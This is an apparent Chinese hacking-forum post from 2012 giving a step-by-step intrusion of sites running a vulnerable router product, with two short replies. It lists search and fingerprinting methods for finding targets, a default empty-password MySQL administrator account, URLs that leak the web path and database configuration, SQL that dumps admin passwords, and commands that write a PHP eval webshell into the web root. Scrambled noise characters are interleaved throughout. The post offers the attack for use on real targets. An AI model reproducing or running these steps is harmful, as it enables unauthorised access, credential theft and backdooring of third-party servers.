中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
( |" q+ V2 A1 j- J2 D
1 i t7 K _7 l6 u" r A$ g7 B3 ]
1:google搜索'Raonet Subscriber Ethernet Router'
% ^9 @; z2 I5 T" m) b
! n( X$ w i& b( c0 B9 J! v* K
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
, E3 G$ J7 k! n- Z: v) c$ [
& b8 _ m3 e" ]" m3 B [
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
: p+ n8 @: Z* Z x
3 m/ C2 b( n& D( `
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
, ]* @% R( e, _+ O
# D. R D# P: Q! F
+ b! K" u8 r- Z4 m& V: t
' x* J7 X5 _& P* Z# s
入侵步骤:
7 D7 H/ `8 K. d) c! T
K+ P( V- ~4 d+ J! h8 c4 }
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
2 _( h8 H6 Z8 E2 D" S
0 z! o; T: Y% v: ^& U" `# e. I
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
; v9 I* l7 X7 j6 o
3:得到密码后连接,查看GUI管理密码:
. a2 Y& A" f# j' m
use ser_500
6 z3 N0 e7 H& c; Z
select id,passwd from user;
' M/ R Z/ \3 F* s. i* F2 s
4:通过数据库写入webshell,执行命令:
3 U( T- V. P' a4 v# C; I0 f3 z1 i7 k$ p+ w
use mysql;
* [% |: _* L( q( I9 ~
create table ok(cmd TEXT);
" i8 V( H9 |$ c# J7 s( b
insert into ok values("<?php @eval($_POST[cmd])?>");
/ q3 o$ d# R2 P$ |7 N
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
: H. a! y: C$ X/ y" i7 A( _
drop table ok;
8 P2 |! w6 |4 \( N$ \* P& l
* }) X0 z* W9 m; B. k& G& i
5:连接后门shell.php
9 C3 s: K6 U x; @4 j
& k q6 }7 l' h# v) H, y- T+ x. ~
6. 搞定!
1 o( Y, Z2 V& w7 o+ C
% X O9 l; R x7 u/ i
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2